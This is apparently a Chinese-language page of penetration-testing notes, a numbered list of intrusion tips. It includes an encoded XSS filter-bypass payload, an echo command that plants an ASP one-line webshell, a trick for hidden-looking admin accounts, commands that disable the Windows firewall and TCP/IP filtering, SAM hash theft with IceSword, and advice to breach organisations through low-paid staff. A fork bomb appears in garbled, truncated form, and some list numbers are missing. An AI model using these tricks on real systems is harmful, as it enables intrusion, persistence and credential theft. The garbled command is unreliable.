滲透筆記 8

1、提權簡單歸納一下，可以分為系統設定與第三方軟體缺陷提權、溢位提權、社會工程學提權。

3、有時候新增賬號沒成功可能是伺服器的強密碼策略（萬惡的2008），改個超強度的密碼再往死裡整吧。

4、有時候能夠新增使用者，但是不能新增管理員組，這時候考慮是不是管理員組被改名了。可以利用net user administrator檢視管理員所屬的組來確定名稱。

5、新增賬號乙個小小技巧，妙用無限：在新增賬號時，將賬號名設為「　」（引號裡的字元為搜狗拼音打v+1時候的d項），不懂什麼意思，net user一下你就知道這個淫蕩的技巧了。

7、xss繞繞繞2：

search?str=***x%3ca%20href=%22data:text/html;%26%230000000000000000098ase64%26%230000000000000044%20pgltzybzcmm9ecbvbmvycm9ypwfszxj0kdeppg==%22%3etest%3c/a%3e

複製**

缺陷引數：str

過濾規則夠bt 但是同樣能繞！

會把提交的編碼給解碼然後再插入到網頁中！然後再對網頁內的值進行檢查過濾！

base64 --< %26%230000000000000000098ase64

複製**

首先%26%23會被還原成 &# 於是變成了： b 於是被還原成：b

b插入到頁面再檢查 b+ase64 = base64 滿足規則於是又過濾成 base64 繞過失敗！

但是如果b的html十進位制編碼再多加幾個000 便不會被他給解碼但是在瀏覽器中又會被解碼於是便可以這樣繞過！

——摘自《xss神器]xssencode chrome外掛程式 – 0x_jin》

8、淚滴攻擊是拒絕服務攻擊的一種。淚滴是乙個特殊構造的應用程式，通過傳送偽造的相互重疊的ip分組資料報，使其難以被接收主機重新組合。他們通常會導致目標主機核心失措。淚滴攻擊利用ip分組資料報重疊造成tcp/ ip分片重組**不能恰當處理ip包。影響的系統有windows 3.1、windows 95和nt、2.0.32和2.1.63版本以下的linux。

9、當防火牆被放置在外網邊界，一般不會開啟ids功能，外網的攻擊比較多，也比較複雜，開啟ids可能導致防火牆的效能出現問題。一般來說，當防火牆處於資訊中心邊界時，可以開啟ids；而在外網邊界可以使用專門的ids或ips裝置。

10、nessus是乙個強大的掃瞄器，強大到它甚至擁有屬於自己的指令碼語言，稱為attack scripting language（nasl）。

11、得到目標站目錄，不能直接跨的。可以通過」 echo ^<%execute(request(「cmd」))%^> >>x:目標目錄 x.asp 「或者「copy 指令碼檔案 x:目標目錄x.asp」像目標目錄寫入 webshell，或者還可以試試 type 命令。

12、在win下關閉防火牆和 tcp/ip 篩選的命令：net stop policyagent & net stop sharedaccess

13、當 gethashes 獲取不到 hash 時，可以用冰刃（icesword）把 sam 複製到桌面（適用於windows 2000/xp/2003/vista作業系統）。

14、一般來說，中文編碼使用big5時，在寫入某些資料庫系統中，在「許、蓋、功」這些字型上面會發生錯誤。

15、:();:

複製**

——linux fork炸彈，其防範的方法是使用命令「ulimit -u 200」來限制每個使用者可以使用的最大程序數量。

16、標準acl , 所謂標準，就是指依照標準ip協議進行過濾，而且只對資料報的源ip位址進行控制。所以，標準acl的應用要盡量靠近目的ip。

17、擴充套件acl應該靠近特徵資料的源位址所在埠，這樣可以將被阻止的資料盡快地組織在不需傳遞它的網路外面。

18、滲透一定意義上是人與人的較量，所以呢，如果你現在月薪5000那麼去黑掉乙個大傢伙的時候應該從月薪2000的地方入手，譬如前台，運營，客服，hr，公關之類的為佳，找程式的入口也應該找實習生開發的，找外包的……

滲透筆記 8

滲透筆記（一）

滲透測試學習筆記初識滲透測試

滲透測試8 回顧

滲透筆記 8

滲透筆記（一）

滲透測試學習筆記 初識滲透測試

滲透測試8 回顧

相關推薦

滲透測試學習筆記初識滲透測試